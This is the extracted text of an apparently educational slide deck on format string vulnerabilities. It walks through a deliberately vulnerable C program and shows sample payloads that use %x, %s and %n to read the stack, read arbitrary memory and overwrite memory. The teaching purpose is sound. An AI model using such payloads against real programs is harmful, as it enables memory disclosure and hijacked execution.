This document discusses format string attacks and how they can be exploited. It provides an example (fsa.c) of a program with a format string vulnerability. By compiling the program without protections and disabling ASLR, an attacker can view the program stack using different format strings. This allows viewing memory at any location and overwriting arbitrary memory by exploiting the %n field. So a format string vulnerability can be used to overwrite return addresses and execute shellcode.
2. About Me
• Study in National Chung Cheng University
• The simulator of 5 axis CNC machine tool
• CUDA programming for the collision detection in real time
• 若渴計畫 & MOSUT
3. Outline
• Illustrating format string vulnerabilities
• A case study
•
•
•
•
•
fsa.c
Compile and setup insecure environment
Viewing the stack
Viewing memory at any location
Overwriting of arbitrary memory
• So, you can…
10. Viewing the Stack:”%x.%x.%x.%x.%x”
heap
“%x.%x.%x.%x.%x”
• Format string = %x.%x.%x.%x.%x
Buffer pointer
Buffer length
• snprintf(buf, sizeof buf, argv[1])
=>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”)
argv[1] pointer
?? b7ff3fec
?? bfffff3b4
?? 0
copy
x = 97 = ‘a’
%x??
Execution order of “copy” and “fetch” are switched by OS
buf[100]=b7ff3fec.
Bfffff3b4.
0.61.66663762(ff7b)
11. Viewing the Stack:
“aaaa.%x.%x.%x.%x.%x”
• Format string = aaaa.%x.%x.%x.%x.%x
heap
“aaaa.%x.%x.%x.%
x.%x”
Buffer pointer
• ‘a’ is 0x61 in ASCII
• snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”)
Buffer length
argv[1] pointer
%x ?? b7ff3fec
%x ?? bfffff3b4
%x ?? 0
%x x = 97 = ‘a’
%x buf[100]=aaaa.b7ff3f
ec.bffff3a4.0.61.6161
6161
12. Viewing Memory at Any Location
• Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x
• Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%s
bffff2f8 x = 97 = ‘a’
%s buf[0]=bffff2f8
13. Overwriting of Arbitrary Memory
• The %n field was encountered in the format string
• Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%n
26(??)
alignment
bffff2f8 x = 97 = ‘a’
%s buf[0]=bffff2f8
bffff2f8 x = 28 = 0x1c
%n buf[0]=bffff2f8
15. You can overwrite arbitrary memory, if
there are format string vulnerabilities
16. Reference
• Tim Newsham, “Format String Attacks”
• http://www.thenewsh.com/~newsham/format-string-attacks.pdf
• stackoverflow,“How can a Format-String vulnerability be exploited?”
• http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited
• Paul Haas, Advanced Format String Attacks
• http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf
• David Brumley, Cource sliedes
• http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf
• Scut et al,”Exploiting Format String Vulnerabilities”
• http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf